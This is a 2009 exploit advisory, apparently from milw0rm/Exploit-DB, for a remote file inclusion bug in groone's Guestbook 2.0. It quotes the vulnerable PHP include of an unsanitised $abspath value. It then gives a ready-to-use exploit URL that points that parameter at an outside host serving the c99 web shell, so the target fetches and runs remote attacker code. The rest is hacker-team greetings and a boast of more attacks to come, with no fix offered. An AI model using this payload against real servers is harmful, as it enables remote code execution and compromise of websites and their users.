groone's Guestbook 2.0 - Remote File Inclusion

EDB-ID:

7955




Platform:

PHP

Date:

2009-02-03


#########################################################
# GBOOK v2.0 Remote File Include Vulnerability
# http://www.groonesworld.com/programs/gbook/gbook.zip
#
#========================================================
# Author: k3vin mitnick( tunisianblackhat team ) =
# =
# Home : http://tunisianblackhat.com & scarface-team.org =
# =
# email: kevinmitnick[A]live.fr = web-terrorist@mail.ru
# =
#=========================================================
#
#        bug : <style type="text/css">
#                       <?php include($abspath."css/gstyle.inc");?>
#                </style>
#
#
# exploit   :
#  http://localhost/gbook/includes/header.php?abspath=http://www.evilc0der.com/c99.txt?
#
#
#
##########################################################
>
>  .:: Tunisian Blackhat team work with scarface-team many suprise as soon ::.
>
> ########################( Greetz )###########################
# scarface-team mrabah12R feyiz marw?-neo  samy chelly
# hug, pelo, iskorpitx , ByalBayx crackerz-Team,milw0rm.com
# C4TEAM & c4team.org & snap and all
# tunisian hackers #
#
#
#
> ###########################################################

# milw0rm.com [2009-02-03]